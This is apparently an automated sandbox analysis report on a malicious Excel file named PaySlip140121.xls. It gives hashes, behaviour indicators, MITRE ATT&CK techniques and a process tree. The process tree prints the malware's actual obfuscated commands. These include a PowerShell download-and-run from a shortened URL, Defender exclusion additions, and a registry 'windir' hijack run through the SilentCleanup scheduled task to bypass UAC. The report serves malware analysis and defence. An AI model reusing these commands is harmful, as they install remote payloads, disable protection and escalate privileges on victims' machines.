e7037dbffd138eb3cb17336a3b50aa9d82613125ce7d66dc7a125f09198e3a82

General

Target

PaySlip140121.xls
Size

228KB
MD5

45ce32bf7aa558411aafeb109f0d6e08
SHA1

41b37cc0c3eedb319846fc2a1a6f90b5bcbf16a8
SHA256

e7037dbffd138eb3cb17336a3b50aa9d82613125ce7d66dc7a125f09198e3a82
SHA512

c3ed5c81264f948854f4f40e81f2ffc6479e056bc9486c14f954daec8e23b1e0fd6c5ed0a3f830724f2585d90b9da6b86c11b409f2ba441516be7869ad5e794e

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cutt.ly/fjYtydH

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3244	3636	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3744	3636	powershell.exe	EXCEL.EXE

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

21 3920 powershell.exe
23 3920 powershell.exe

flow	pid	process
21	3920	powershell.exe
23	3920	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2064 timeout.exe

pid	process
2064	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3636 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

3920 powershell.exe
3920 powershell.exe
3920 powershell.exe
3744 powershell.exe
3744 powershell.exe
3744 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3920 powershell.exe
Token: SeDebugPrivilege 3744 powershell.exe

pid	process
3920	powershell.exe
3920	powershell.exe
3920	powershell.exe
3744	powershell.exe
3744	powershell.exe
3744	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3920	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

EXCEL.EXE

pid	process
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE
3636	EXCEL.EXE

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.execmd.exe

description	pid	process	target process
PID 3636 wrote to memory of 3244	3636	EXCEL.EXE	cmd.exe
PID 3636 wrote to memory of 3244	3636	EXCEL.EXE	cmd.exe
PID 3244 wrote to memory of 3920	3244	cmd.exe	powershell.exe
PID 3244 wrote to memory of 3920	3244	cmd.exe	powershell.exe
PID 3636 wrote to memory of 3744	3636	EXCEL.EXE	powershell.exe
PID 3636 wrote to memory of 3744	3636	EXCEL.EXE	powershell.exe
PID 3744 wrote to memory of 3796	3744	powershell.exe	cmd.exe
PID 3744 wrote to memory of 3796	3744	powershell.exe	cmd.exe
PID 3796 wrote to memory of 3464	3796	cmd.exe	cmd.exe
PID 3796 wrote to memory of 3464	3796	cmd.exe	cmd.exe
PID 3796 wrote to memory of 4000	3796	cmd.exe	reg.exe
PID 3796 wrote to memory of 4000	3796	cmd.exe	reg.exe
PID 3796 wrote to memory of 2064	3796	cmd.exe	timeout.exe
PID 3796 wrote to memory of 2064	3796	cmd.exe	timeout.exe
PID 3796 wrote to memory of 2724	3796	cmd.exe	schtasks.exe
PID 3796 wrote to memory of 2724	3796	cmd.exe	schtasks.exe
PID 3796 wrote to memory of 3896	3796	cmd.exe	reg.exe
PID 3796 wrote to memory of 3896	3796	cmd.exe	reg.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PaySlip140121.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3636

C:\Windows\SYSTEM32\cmd.exe
cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://cutt.ly/fjYtydH','a.bat')
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://cutt.ly/fjYtydH','a.bat')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 ./a.bat
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\a.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:3796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ver
4⤵
PID:3464

C:\Windows\system32\reg.exe
reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "C:\tmp" ;Add-MpPreference -ExclusionPath "${EN`V`:APPdAta}" ;sTAR`T-sl`EeP 12;(nEw-oBje`cT Net.WebcL`IENt).('Down'+'load'+'Fi'+'le').InVoke('https://rebrand.ly/0hgqm96',(${EN`V`:Appdata})+'\ok.exe');sTAR`T-sl`EeP 2; sTAR`T-pr`OCeSs ${EN`V`:Appdata}\ok.exe;
4⤵
PID:4000

C:\Windows\system32\timeout.exe
timeout /t 2
4⤵
- Delays execution with timeout.exe
PID:2064

C:\Windows\system32\schtasks.exe
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
4⤵
PID:2724

C:\Windows\system32\reg.exe
reg delete "HKCU\Environment" /v "windir" /F
4⤵
PID:3896

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
b346252fc3402a8f9552de980b4d5bf4

SHA1
e334a503dcf33f5ce0c80a282f1b73ad596d224b

SHA256
1cbdf33258112c4d294618126f4c920436e14a4f1879a00441388bc455556201

SHA512
069aa6baca7d77b5d5086922df095b86cef4abac6290d4e2709b6665968fd73b5b264bfc34f744a608ea0a8f54f7418a07d9f5fbc7b398c00e6ad6119e0d789e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2bc1e67ace6994bef4a6ed24e36b1005

SHA1
2e9cfaf5fb6e71b97013f9a2ff772a6d7a36e843

SHA256
01dcbe306391163edec28b57e72a6e410503078a86c4b843227f1a8f9a92e64a

SHA512
ef0a1047816ae2d8ad2a44bf856e3c8a676eb4bd2d966f5f548e3fa222c1ea9a36b754ffa3ab087fda28500601371963ecfc3ff6808c28bc6a79dfaba5ca3a53

Download Submit
C:\Users\Admin\Documents\a.bat
MD5
575fcb5eda3934c5376e187ffffb6a85

SHA1
64c6070943b3444f014ccd594ee3482eb663b9ab

SHA256
eb29e191f9c36047c634756a82d6db68ffad225d3f33ba1bfefe316564975ef6

SHA512
f28b5eac8a94350ea9c97c0471fbdc650a66097fc11ce3f16e36bd43b95258081894d9baf256516d568fcb324ffa8caf53c04c1e93cdd0a7e3f2bee925e6bc6a

Download Submit
C:\Users\Admin\Documents\a.bat
MD5
575fcb5eda3934c5376e187ffffb6a85

SHA1
64c6070943b3444f014ccd594ee3482eb663b9ab

SHA256
eb29e191f9c36047c634756a82d6db68ffad225d3f33ba1bfefe316564975ef6

SHA512
f28b5eac8a94350ea9c97c0471fbdc650a66097fc11ce3f16e36bd43b95258081894d9baf256516d568fcb324ffa8caf53c04c1e93cdd0a7e3f2bee925e6bc6a

Download Submit
memory/2064-28-0x0000000000000000-mapping.dmp

Download
memory/2724-29-0x0000000000000000-mapping.dmp

Download
memory/3244-7-0x0000000000000000-mapping.dmp

Download
memory/3464-24-0x0000000000000000-mapping.dmp

Download
memory/3636-6-0x00007FF8E8E70000-0x00007FF8E94A7000-memory.dmp

Filesize
6.2MB

Download
memory/3636-3-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmp

Filesize
64KB

Download
memory/3636-2-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmp

Filesize
64KB

Download
memory/3636-4-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmp

Filesize
64KB

Download
memory/3636-5-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmp

Filesize
64KB

Download
memory/3744-16-0x0000000000000000-mapping.dmp

Download
memory/3744-26-0x0000015EFD660000-0x0000015EFD662000-memory.dmp

Filesize
8KB

Download
memory/3744-27-0x0000015EFD663000-0x0000015EFD665000-memory.dmp

Filesize
8KB

Download
memory/3744-18-0x00007FF8E0620000-0x00007FF8E100C000-memory.dmp

Filesize
9.9MB

Download
memory/3744-31-0x0000015EFD666000-0x0000015EFD668000-memory.dmp

Filesize
8KB

Download
memory/3796-22-0x0000000000000000-mapping.dmp

Download
memory/3896-30-0x0000000000000000-mapping.dmp

Download
memory/3920-9-0x00007FF8E0620000-0x00007FF8E100C000-memory.dmp

Filesize
9.9MB

Download
memory/3920-14-0x0000021EDA736000-0x0000021EDA738000-memory.dmp

Filesize
8KB

Download
memory/3920-13-0x0000021EDA733000-0x0000021EDA735000-memory.dmp

Filesize
8KB

Download
memory/3920-12-0x0000021EDA730000-0x0000021EDA732000-memory.dmp

Filesize
8KB

Download
memory/3920-11-0x0000021EDA940000-0x0000021EDA941000-memory.dmp

Filesize
4KB

Download
memory/3920-10-0x0000021EDA680000-0x0000021EDA681000-memory.dmp

Filesize
4KB

Download
memory/3920-8-0x0000000000000000-mapping.dmp

Download
memory/4000-25-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads